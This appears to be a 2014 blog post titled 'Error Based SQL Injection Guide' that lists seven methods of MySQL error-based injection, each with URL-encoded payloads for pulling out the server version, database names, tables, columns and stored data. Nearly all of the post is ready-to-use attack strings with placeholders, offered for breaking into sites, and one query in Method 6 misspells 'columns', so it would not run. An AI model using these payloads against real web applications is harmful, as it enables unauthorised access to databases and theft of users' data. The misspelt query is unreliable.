Friday, 12 December 2014

Error Based SQL Injection Guide

As you may know, there are several different methods of Error Based Injection. I know there's been a few tutorials lately, but I always love showing you guys something new. I'm going to be going over a few different queries you can use.

Method 1

Let's start with some Double Query.

Version

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(version()+as+char),0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Tables

[code]+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)[/code]

You can change the table schema to get the tables out of your specified database by converting your DB name to hex and using the following query.

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHEX+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Getting The Database Names

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(schema_name+as+char),0x7e))+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Columns

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Data

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(COLUMN1,0x7e,COLUMN2)+as+char),0x7e))+from+TABLENAME+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

To get data out of a different database, use this query.

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(COLUMN1,0x7e,COLUMN2)+as+char),0x7e))+from+DATABASENAME.TABLENAME+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Method 2

This is standard Error Based Injection.

Version

+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

Tables

+or+1+group+by+concat_ws(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--

The same rules apply, you can get the tables out of a different database by changing the schema.

+or+1+group+by+concat_ws(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0xDATABASEHEX+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--

Columns

+or+1+group+by+concat_ws(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0xTABLENAME+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--

Getting Data From The Columns

+or+1+group+by+concat_ws(0x7e,(select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--

Method 3

These here are harder methods of error based, that you shouldn't go into unless the ones above don't work.

Tables

+and+(select+count(*)+from+(select+1+union+select+null+union+select+!1)x+group+by+concat((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2)))--

Columns

+and+(select+count(*)+from+(select+1+union+select+null+union+select+!1)x+group+by+concat((select+column_name+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1),floor(rand(0)*2)))--

Data

+and+(select+count(*)+from+(select+1+union+select+null+union+select+!1)x+group+by+concat((select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1),floor(rand(0)*2)))--

Method 4

Here's another method that's not very common.

Tables
parameter[]=(@:=1)||@+group+by+concat((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),0x7e,!@)+having+@||min(@:=0)--

Columns
parameter[]=(@:=1)||@+group+by+concat((select+column_name+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1),0x7e,!@)+having+@||min(@:=0)--

Data
parameter[]=(@:=1)||@+group+by+concat((select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1),0x7e,!@)+having+@||min(@:=0)--

Method 5

Another method, pretty basic.

Tables
+and+(select+1+from+(select+count(*),concat(floor(rand(0)*2),0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1))x+from+information_schema.tables+group+by+x)a)--

Columns
+and+(select+1+from+(select+count(*),concat(floor(rand(0)*2),0x7e,(select+column_name+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1))x+from+information_schema.tables+group+by+x)a)--

Data
+and+(select+1+from+(select+count(*),concat(floor(rand(0)*2),0x7e,(select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1))x+from+information_schema.tables+group+by+x)a)--

Method 6

Here's another method, I don't see it used much.

Tables
+and+row(1,1)>(select+count(*),concat((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),0x7e,floor(rand(0)*2))x+from+(select+1+union+select+null+union+select+!1)x group+by+x+limit+0,1)--

Columns
+and+row(1,1)>(select+count(*),concat((select+column_name+from+information_schema.columnes+where+table_name=0xTABLEHEX+limit+0,1),0x7e,floor(rand(0)*2))x+from+(select+1+union+select+null+union+select+!1)x group+by+x+limit+0,1)--

Data
+and+row(1,1)>(select+count(*),concat((select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1),0x7e,floor(rand(0)*2))x+from+(select+1+union+select+null+union+select+!1)x group+by+x+limit+0,1)--

Method 7

Here's another method using Sub Selects Subselects w/ Aliases

+and+(select+*+from+(select+*+from+information_schema.tables+join+information_schema.tables+x)a)--

Duplicate column name 'TABLE_CATALOG'


This will work almost as a limit, getting you column names one by one.

+and+(select+*+from+(select+*+from+TABLENAME+as+x+join+TABLENAME+y+using+(COLUMN_NAME))as+z)--

So mine looks like this..

+and+(select+*+from+(select+*+from+information_schema.tables+as+x+join+information_schema.tables+y+using+(TABLE_CATALOG))as+z)--

Duplicate column name 'TABLE_SCHEMA'


That's it for now, I'll try and update this when I learn more methods of error based injection.




No comments:

Post a Comment